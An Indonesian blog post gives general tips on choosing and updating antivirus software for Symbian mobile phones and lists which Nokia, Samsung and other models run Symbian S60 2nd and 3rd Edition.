Jangan memasang anti virus yang hanya diperuntukan untuk menangkap satu virus saja, semisal anti commwarrior

Saran saya gunakan antivirus yang telah berpuluh tahun berkicumpung dalam dunia virus PC contohnya : Symantec  Mobile anti virus, Antivir Mobile, Kapersky mobile anti virus, F-Secure mobile, Panda mobile, dll.

Jadwalkan untuk selalu memperbaharui database, virus definition dari anti virus yang sedang anda gunakan

Sekedar informasi buat anda, di blog saya ini banyak juga yang menanyakan tentang anti virus ponsel nokia, sony ericsson yang tidak punya system operasi. Anda harus ingat bahawa saat ini hanya ponsel yang memiliki system operasi lah yang akan bisa dijangkiti oleh virus seperti system operasi Symbian yang kebanyakan dipakai oleh nokia ( Symbian 2nd Edition dan Symbian 3rd Edition ), tipe ponsel sony ericsson seri “P”dan juga beberapa ponsel milik samsung. jadi buat anda yang memiliki ponsel dengan dukungan Java M1DP, tidak akan terkena virus. Walaupun virus itu masuk ke ponsel Java, disana virus tsb tidak akan bisa beraksi alias mati.
Berhati – hatilah dalam menggunakan ponsel symbian anda karena dalam kasus terinfeksinya sebuah ponsel oleh virus yang selama ini masih dalam tidak membahayakan biasanya ponsel restart sendiri atau virus akan menelpon, mengirim SMS/MMS tanpa sepengetahuan si pemilik ponsel.
Info :
Ponsel yang masuk dalam kategori Symbian S60 2nd Edition :
Symbian 60 Series
Nokia 3600, Nokia 3620, Nokia 3650, Nokia 3660, Nokia 7650, N-Gage, N-Gage QD, Siemens SX1, Lenovo P930, Nokia 3230, Nokia 6260, Nokia 6600, Nokia 6620, Nokia 6630, Nokia Nokia 6670, Nokia 6680, Nokia 6681, Nokia 6682, Nokia 7610, Nokia N70, Nokia N72, Nokia Nokia N90, Panasonic X700, Panasonic X800, Samsung D720, Samsung D730, Samsung Z600

Ponsel yang masuk dalam kategori Symbian S60 3rd Edition :
Symbian OS-9.1/9.2/9.3
LG KS10, Nokia 3250, Nokia 5500, Nokia 5700, Nokia 6110 Navigator, Nokia 6120, Nokia 6121, Nokia 6290, Nokia E50, Nokia E51, Nokia E60, Nokia E61, Nokia E62, Nokia E61i, Nokia E65, Nokia E70, Nokia E90, Nokia N71, Nokia N73, Nokia N75, Nokia N76, Nokia N77, Nokia N80, Nokia N81, Nokia N81 8GB, Nokia N82, Nokia N91, N91 8GB, Nokia N92, Nokia N93, Nokia N93i, Nokia N95, Nokia N95 8GB, Samsung i400, Samsung i450, Samsung i520, Samsung i500, Samsung i560,5320 XpressMusic,N78,N96,N6210 Navigator&N6220 classic

LOGIN

Template by : JON'S